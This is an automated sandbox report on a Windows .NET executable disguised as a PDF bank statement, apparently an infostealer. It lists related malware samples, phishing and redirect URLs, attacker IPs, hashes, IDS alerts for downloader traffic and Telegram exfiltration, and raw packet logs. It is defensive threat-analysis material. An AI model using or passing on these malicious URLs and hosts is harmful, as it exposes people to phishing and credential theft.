                                                                                                              https://cdn.trytraffics.com/rdr/YWE9MzUyODAwODkxJnNlaT0zMDQ3NDU3NCZ0az1JR0doTXJGNXNpVnJBYzZkWlBUWSZ0PTUmYz05MGFzODc2ZmQ4OWFzNWZnOGEwOXM=Get hashmaliciousUnknownBrowse
                                                                                                              • 188.114.96.3
                                                                                                              https://sreamconmymnltty.com/scerty/bliun/bolopGet hashmaliciousUnknownBrowse
                                                                                                              • 104.17.25.14

                                                                                                              JA3 Fingerprints

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              54328bd36c14bd82ddaa0c04b25ed9adRFQ_AS0101402025.22025_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.96.1
                                                                                                              QUOTATION REQUIRED_Enatel s.r.l..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.96.1
                                                                                                              Confirm Bank Statement.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              • 104.21.96.1
                                                                                                              50201668.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.96.1
                                                                                                              TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.96.1
                                                                                                              MB263350411AE_1.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              • 104.21.96.1
                                                                                                              ABG Draft.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              • 104.21.96.1
                                                                                                              RENH3RE2025QUOTE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              • 104.21.96.1
                                                                                                              PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.96.1
                                                                                                              tN8GsMV1le.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.96.1
                                                                                                              3b5074b1b5d032e5620f69f9f700ff0eNLWfV87ouS.dllGet hashmaliciousWannacryBrowse
                                                                                                              • 149.154.167.220
                                                                                                              542CxvZnI5.dllGet hashmaliciousVirut, WannacryBrowse
                                                                                                              • 149.154.167.220
                                                                                                              https://cc68b94d-d9d0-4a03-bf37-d58a3335e1ce.p.reviewstudio.com/-/en/b/?_encoding=UTF8&_encoding=UTF8&node=3024314031&bbn=16435051&pd_rd_w=VSdHJ&content-id=amzn1.sym.01fcb23a-92a2-4260-b9bf-7c78abf408da&pf_rd_p=01fcb23a-92a2-4260-b9bf-7c78abf408da&pf_rd_r=E0WD16QK99B55VAWSKBQ&pd_rd_wg=EU3Lj&pd_rd_r=fd3510c2-a6e6-4f59-a468-c59aac80bfa9&ref_=pd_hp_d_btf_unkGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              https://ziyahid.github.io/netflix-cloneGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 149.154.167.220
                                                                                                              http://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 149.154.167.220
                                                                                                              http://emeklilereozeldir.org/Get hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              http://industrious-tomato-ngvkcs.mystrikingly.com/Get hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              http://telegroom-nzj.icu/Get hashmaliciousTelegram PhisherBrowse
                                                                                                              • 149.154.167.220
                                                                                                              https://cdn.trytraffics.com/rdr/YWE9MzUyODAwODkxJnNlaT0zMDQ3NDU3NCZ0az1JR0doTXJGNXNpVnJBYzZkWlBUWSZ0PTUmYz05MGFzODc2ZmQ4OWFzNWZnOGEwOXM=Get hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              https://sreamconmymnltty.com/scerty/bliun/bolopGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220

                                                                                                              Dropped Files

                                                                                                              No context

                                                                                                              Created / dropped Files

                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rDEKONT-1_15_2025__75kb__pdf.exe.log

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1216
                                                                                                              Entropy (8bit):5.34331486778365
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                              Malicious:true
                                                                                                              Reputation:high, very likely benign file
                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Entropy (8bit):7.677501432774229
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                                              File name:rDEKONT-1_15_2025__75kb__pdf.exe
                                                                                                              File size:854'016 bytes
                                                                                                              MD5:eba7ff0d3cb799af22795e1d3c55360c
                                                                                                              SHA1:e09436242af4a602b31b40571bebe468c229a4fb
                                                                                                              SHA256:701cc76315954f7e5e8b0fb36db44cdb6e6e40384be529670490523be1429d8f
                                                                                                              SHA512:61ff14d46ec42deafbbd978fde98f67accdb9ca84d884dd003a1c24015b540ecde40209eb0eee243a485e382e7ed8ee1d1feaaef3b3c5173a9919df5c52a6dc2
                                                                                                              SSDEEP:24576:76JN+UVsa/olbtDr4eD+Rq9B4of+mpZwobRUcx/LoB:O3+Ufq7+R6FpZjbBuB
                                                                                                              TLSH:F805D1C03B2A7311CEBCB534853ADCB9A2642E74B004B9E26EED2B5775DD113AA1DF44
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..............0.................. ... ....@.. .......................`............@................................

                                                                                                              File Icon

                                                                                                              Icon Hash:0066b49631f8dc38

                                                                                                              Static PE Info

                                                                                                              General

                                                                                                              Entrypoint:0x4d0faa
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                              Time Stamp:0x6787061B [Wed Jan 15 00:49:31 2025 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:4
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:4
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:4
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                              Entrypoint Preview

                                                                                                              Instruction
                                                                                                              jmp dword ptr [00402000h]
                                                                                                              lodsd
                                                                                                              fiadd word ptr [eax]
                                                                                                              add bh, ch
                                                                                                              mov esi, CAFE0000h
                                                                                                              add byte ptr [eax], al
                                                                                                              mov esi, 000000BAh
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al

                                                                                                              Data Directories

                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xd0f580x4f.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xd20000x126c.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xd40000xc.reloc
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                              Sections

                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              .text0x20000xcefc00xcf00014a2ec87390fd5b67a0bf5c4d4ba1386False0.8775652456974637PGP symmetric key encrypted data - Plaintext or unencrypted data7.683784572394097IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                              .rsrc0xd20000x126c0x1400d8f247ecd110bafa6294ccdc426ee97eFalse0.7080078125data6.392924658263187IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .reloc0xd40000xc0x20020b73237aeea3319bcd39ce4de41d234False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                              Resources

                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                              RT_ICON0xd21000xbdfPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9348469891411648
                                                                                                              RT_GROUP_ICON0xd2cf00x14data1.05
                                                                                                              RT_VERSION0xd2d140x358data0.4287383177570093
                                                                                                              RT_MANIFEST0xd307c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                              Imports

                                                                                                              DLLImport
                                                                                                              mscoree.dll_CorExeMain

                                                                                                              Network Behavior

                                                                                                              Suricata IDS Alerts

                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                              2025-01-15T04:01:58.177441+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549706193.122.6.16880TCP
                                                                                                              2025-01-15T04:01:59.286838+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549706193.122.6.16880TCP
                                                                                                              2025-01-15T04:01:59.838451+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549709104.21.96.1443TCP
                                                                                                              2025-01-15T04:02:00.522599+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549710193.122.6.16880TCP
                                                                                                              2025-01-15T04:02:01.273507+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549712104.21.96.1443TCP
                                                                                                              2025-01-15T04:02:03.911273+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549717104.21.96.1443TCP
                                                                                                              2025-01-15T04:02:05.166137+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549719104.21.96.1443TCP
                                                                                                              2025-01-15T04:02:09.897310+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.549726149.154.167.220443TCP

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Jan 15, 2025 04:01:56.529614925 CET4970680192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:01:56.534487009 CET8049706193.122.6.168192.168.2.5
                                                                                                              Jan 15, 2025 04:01:56.534548044 CET4970680192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:01:56.534813881 CET4970680192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:01:56.539571047 CET8049706193.122.6.168192.168.2.5
                                                                                                              Jan 15, 2025 04:01:57.449129105 CET8049706193.122.6.168192.168.2.5
                                                                                                              Jan 15, 2025 04:01:57.489944935 CET4970680192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:01:57.724092007 CET4970680192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:01:57.729049921 CET8049706193.122.6.168192.168.2.5
                                                                                                              Jan 15, 2025 04:01:58.127423048 CET8049706193.122.6.168192.168.2.5
                                                                                                              Jan 15, 2025 04:01:58.169548035 CET49708443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:01:58.169593096 CET44349708104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:01:58.169661045 CET49708443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:01:58.174599886 CET49708443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:01:58.174611092 CET44349708104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:01:58.177440882 CET4970680192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:01:58.637579918 CET44349708104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:01:58.637660980 CET49708443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:01:58.642822981 CET49708443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:01:58.642831087 CET44349708104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:01:58.643074036 CET44349708104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:01:58.684400082 CET49708443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:01:58.727339029 CET44349708104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:01:58.806286097 CET44349708104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:01:58.806345940 CET44349708104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:01:58.806490898 CET49708443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:01:58.819315910 CET49708443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:01:58.822112083 CET4970680192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:01:58.827151060 CET8049706193.122.6.168192.168.2.5
                                                                                                              Jan 15, 2025 04:01:59.242707014 CET8049706193.122.6.168192.168.2.5
                                                                                                              Jan 15, 2025 04:01:59.245131969 CET49709443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:01:59.245224953 CET44349709104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:01:59.245320082 CET49709443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:01:59.245666981 CET49709443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:01:59.245691061 CET44349709104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:01:59.286838055 CET4970680192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:01:59.701385975 CET44349709104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:01:59.703566074 CET49709443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:01:59.703605890 CET44349709104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:01:59.838454008 CET44349709104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:01:59.838507891 CET44349709104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:01:59.838584900 CET49709443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:01:59.838972092 CET49709443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:01:59.841753006 CET4970680192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:01:59.842933893 CET4971080192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:01:59.846803904 CET8049706193.122.6.168192.168.2.5
                                                                                                              Jan 15, 2025 04:01:59.846865892 CET4970680192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:01:59.847815037 CET8049710193.122.6.168192.168.2.5
                                                                                                              Jan 15, 2025 04:01:59.847882986 CET4971080192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:01:59.847949028 CET4971080192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:01:59.852767944 CET8049710193.122.6.168192.168.2.5
                                                                                                              Jan 15, 2025 04:02:00.482542992 CET8049710193.122.6.168192.168.2.5
                                                                                                              Jan 15, 2025 04:02:00.483912945 CET49712443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:00.483956099 CET44349712104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:00.484050035 CET49712443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:00.484987974 CET49712443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:00.485002041 CET44349712104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:00.522598982 CET4971080192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:02:01.117568016 CET44349712104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:01.122114897 CET49712443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:01.122139931 CET44349712104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:01.273600101 CET44349712104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:01.273777008 CET44349712104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:01.273889065 CET49712443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:01.274255991 CET49712443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:01.278036118 CET4971380192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:02:01.283900023 CET8049713193.122.6.168192.168.2.5
                                                                                                              Jan 15, 2025 04:02:01.283967972 CET4971380192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:02:01.284048080 CET4971380192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:02:01.290906906 CET8049713193.122.6.168192.168.2.5
                                                                                                              Jan 15, 2025 04:02:01.918989897 CET8049713193.122.6.168192.168.2.5
                                                                                                              Jan 15, 2025 04:02:01.920420885 CET49715443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:01.920464039 CET44349715104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:01.920557976 CET49715443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:01.920794010 CET49715443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:01.920804024 CET44349715104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:01.974318027 CET4971380192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:02:02.387032032 CET44349715104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:02.388428926 CET49715443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:02.388458014 CET44349715104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:02.518109083 CET44349715104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:02.518246889 CET44349715104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:02.518306971 CET49715443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:02.518609047 CET49715443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:02.521759987 CET4971380192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:02:02.522727013 CET4971680192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:02:02.526777029 CET8049713193.122.6.168192.168.2.5
                                                                                                              Jan 15, 2025 04:02:02.526845932 CET4971380192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:02:02.527580023 CET8049716193.122.6.168192.168.2.5
                                                                                                              Jan 15, 2025 04:02:02.527674913 CET4971680192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:02:02.527822971 CET4971680192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:02:02.532576084 CET8049716193.122.6.168192.168.2.5
                                                                                                              Jan 15, 2025 04:02:03.203757048 CET8049716193.122.6.168192.168.2.5
                                                                                                              Jan 15, 2025 04:02:03.204955101 CET49717443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:03.204997063 CET44349717104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:03.205070972 CET49717443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:03.205351114 CET49717443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:03.205364943 CET44349717104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:03.255568981 CET4971680192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:02:03.686846018 CET44349717104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:03.688288927 CET49717443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:03.688311100 CET44349717104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:03.911293983 CET44349717104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:03.911398888 CET44349717104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:03.911545038 CET49717443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:03.911778927 CET49717443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:03.914721966 CET4971680192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:02:03.915929079 CET4971880192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:02:03.919684887 CET8049716193.122.6.168192.168.2.5
                                                                                                              Jan 15, 2025 04:02:03.919744968 CET4971680192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:02:03.920785904 CET8049718193.122.6.168192.168.2.5
                                                                                                              Jan 15, 2025 04:02:03.920849085 CET4971880192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:02:03.921000957 CET4971880192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:02:03.925728083 CET8049718193.122.6.168192.168.2.5
                                                                                                              Jan 15, 2025 04:02:04.547422886 CET8049718193.122.6.168192.168.2.5
                                                                                                              Jan 15, 2025 04:02:04.548794031 CET49719443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:04.548846006 CET44349719104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:04.548954964 CET49719443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:04.549215078 CET49719443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:04.549226046 CET44349719104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:04.599447012 CET4971880192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:02:05.007234097 CET44349719104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:05.016590118 CET49719443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:05.016612053 CET44349719104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:05.166163921 CET44349719104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:05.166238070 CET44349719104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:05.166287899 CET49719443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:05.166656017 CET49719443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:05.169538021 CET4971880192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:02:05.170484066 CET4972080192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:02:05.174494028 CET8049718193.122.6.168192.168.2.5
                                                                                                              Jan 15, 2025 04:02:05.174562931 CET4971880192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:02:05.175326109 CET8049720193.122.6.168192.168.2.5
                                                                                                              Jan 15, 2025 04:02:05.175391912 CET4972080192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:02:05.175487995 CET4972080192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:02:05.180241108 CET8049720193.122.6.168192.168.2.5
                                                                                                              Jan 15, 2025 04:02:05.810555935 CET8049720193.122.6.168192.168.2.5
                                                                                                              Jan 15, 2025 04:02:05.811770916 CET49721443192.168.2.5104.21.96.1
